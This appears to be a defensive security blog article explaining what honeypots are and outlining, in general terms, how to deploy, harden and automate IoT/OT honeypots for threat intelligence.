Why Honeypots Matter in IoT/OT Security 

Honeypots are a valuable component in the modern threat intelligence toolkit. The ability to track malicious traffic without exposing critical company assets means defenders can identify how criminals aim to compromise their systems. They gain invaluable intelligence on threat actor tactics, techniques, procedures, and possible methods to improve their defenses. 

More than that, honeypots are an incredibly efficient and cheap way to test security practices. Deploying a honeypot on the network can be done with minimal effort, using equipment that was decommissioned and repurposed for use. This is even only for traditional IT like workstations and network gateways. 

With Internet of Things (IoT) devices and operational technology (OT), honeypots become even more vital to a strong cyber defense strategy. The amount of cyber attacks is increasing across the board, and more IoT devices deployed in different settings means that threat actors are targeting them more frequently. 

This makes deploying decommissioned IoT devices as honeypots even more of an attractive facet of a defensive strategy. As part of deploying one within an IoT architecture, it’s important to understand how they function. 

What is a Honeypot? 

In the simplest terms, a honeypot is a trap baited for attackers. The technology is structured in such a way as to make it attractive for threat actors scanning a network for targets. Within the context of traditional IT, this could be a workstation with limited software or a cloud asset within a virtual private cloud. 

The important part is that the honeypot is not connected to any production environment. It is an orphan asset designed to act only as a lure for malicious activity. Because no legitimate traffic is going to the asset, the only network traffic touching the honeypot will come from malicious actors. 

This makes the honeypot an invaluable asset regarding cyber defense. Ideally, threat actors are trapped and can’t move laterally to cause further damage once they engage in the trap. All the while defenders gather data about the attack chain and use that insight to improve their defenses. 

Honeypots become even more important with IoT devices, especially as more connected devices are deployed within different companies. Threat actors will continue to attack these systems. And that requires more tools like honeypots to defend them. 

The Benefits and Drawbacks of Honeypots

Honeypots are extremely beneficial as part of a strategy to improve IoT/OT security. Part of the issue with defending connected equipment is understanding how attackers target these systems and what they intend to do once gaining a foothold. An IoT/OT honeypot that traps attackers can gather that information and empower you with intelligence into: 

• Where cybercriminals are coming from
• Threat level
• What methods they’re using
• The data or applications they are interested in
• How well your security measures work to stop cyberattacks

These are incredibly valuable details that security teams can use internally and share with the community as part of improving everyone else’s defenses too. For IoT/OT security, honeypots can be used to track patterns in IP addresses, geographic sources of traffic, or any other patterns that might signify an attack. 

How to Set up an IoT/OT Honeypot

IoT/OT honeypots are typically set up to mimic specific devices or protocols on the network. Ideally, this is a device that has previously been exploited or is of some interest overall. This could be something like a connected security camera or an internet-enabled HVAC system. Once you’ve chosen the device or protocol to mimic, you need to understand any publicly identified vulnerabilities. 

Knowing about identified vulnerabilities will give you an idea about what to emulate in the honeypot. Remember that honeypots are designed to be attractive to threat actors, so you’re going to build intentional weaknesses into the system. Threat actors will notice the weakness and attack the trap instead of your real systems. 

Setting up a test environment is the next step. Doing this can be complex. Ideally, you’ve tested the configuration of the honeypot with a public exploit. This means that you’ve got to reset the device to a clean slate, which can sometimes be challenging for IoT/OT systems. Virtual machines make it easier to reset to a clean state, but they also make it simpler for threat actors to identify a testing environment. 

The best option for a test environment is to deploy specific honeypot systems like Cowrie that fully mimic Linux via SSH with fake file systems and other false information expressly designed to replicate real system architecture. This is also the method that takes the longest to deploy. 

Next, you need to set up detection rules for when the system is misused or exploitation occurs. These are some limitations in certain systems, so make certain that you get as much visibility as possible into activity within the honeypot. More visibility means that you can more readily determine what the threat actor is trying to do and how they act. That can lead to improved defenses for the rest of your network, and even provide value to your peers. 

Hardening the honeypot is the next, and arguably most vital, step of deploying one of these systems. Traps are only effective if the thing being trapped can’t break out. Creating and deploying a honeypot on your network has to be done in such a way that the threat actor is pulled in and can’t use the system to move laterally. Further, you have to configure the IoT/OT honeypot in such a way that communication outside of it is impossible and there’s no way to change device configurations to enable external communication. 

Lastly, automate the process of data gathering and resetting the honeypot device. You want to gather intelligence from the system as quickly and efficiently as possible as there could be multiple honeypots running on the same network after all. Moreover, you also want to reset the device to a clean slate for the next threat actor. Automation is key here and needs to be implemented as part of creating the trap. Without automating the process, you risk not being able to reset all the honeypots to a clean slate at the necessary speed. 

Honeypots as a Strategic Linchpin for Threat Intelligence

Honeypots are a vital component of a threat intelligence strategy. Setting them up ensures that you can potentially track how attackers aim to compromise your network, including the telemetry necessary to accurately gather that information. Understanding how attackers might seek to compromise your IoT/OT devices through honeypots can improve your defenses and ultimately ensure a long-term security strategy for connected equipment.